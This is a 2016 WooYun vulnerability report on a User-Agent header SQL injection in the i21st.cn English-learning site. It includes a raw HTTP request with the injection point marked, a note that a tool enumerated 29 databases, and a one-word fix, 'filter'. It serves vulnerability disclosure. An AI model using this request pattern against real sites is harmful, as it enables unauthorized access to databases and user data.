破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

21英语网主站存在SQL注入

编号219568
Urlhttp://www.wooyun.org/bug.php?action=view&id=219568
漏洞状态厂商已经修复
漏洞标题21英语网主站存在SQL注入
漏洞类型SQL注射漏洞
厂商i21st.cn
白帽子风若新
提交日期2016-06-15 17:16:00
公开日期2016-06-20 09:11:00
修复时间2016-06-20 09:11:00
确认时间2016-06-20 00:00:00
Confirm Spend5
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank10
漏洞简介
21英语网主站存在SQL注入
漏洞细节

21英语网主站存在SQL注入
是头部User-Agent 头部注入呀
post数据包

GET /london2012/tour.html HTTP/1.1
Host: www.i21st.cn
User-Agent: 1*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JumpM1=1; cck_lasttime=1465962000971; cck_count=0; Hm_lvt_63a93376491d073b73b9013396ad02a8=1465962002; Hm_lpvt_63a93376491d0
73b73b9013396ad02a8=1465962430; PHPSESSID=p8qh1ci8prt9dfqmee8hd7vmf3
Connection: keep-alive


User-Agent 头部存在注入
使用工具测试

0.jpg


发现存在漏洞
数据库信息 29个

1.jpg


好了,就这些内容,盲注效率比较低!数据内容还是比较多的!

POC

21英语网主站存在SQL注入
是头部User-Agent 头部注入呀
post数据包

GET /london2012/tour.html HTTP/1.1
Host: www.i21st.cn
User-Agent: 1*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JumpM1=1; cck_lasttime=1465962000971; cck_count=0; Hm_lvt_63a93376491d073b73b9013396ad02a8=1465962002; Hm_lpvt_63a93376491d0
73b73b9013396ad02a8=1465962430; PHPSESSID=p8qh1ci8prt9dfqmee8hd7vmf3
Connection: keep-alive


User-Agent 头部存在注入
使用工具测试

0.jpg


发现存在漏洞
数据库信息 29个

1.jpg


好了,就这些内容,盲注效率比较低!数据内容还是比较多的!

修复方案

过滤

状态信息 2016-06-15: 细节已通知厂商并且等待厂商处理中
2016-06-20: 厂商已经确认,细节仅向厂商公开
2016-06-20: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复确认
回应信息危害等级:中漏洞Rank:10 确认时间:2016-06-20 09:10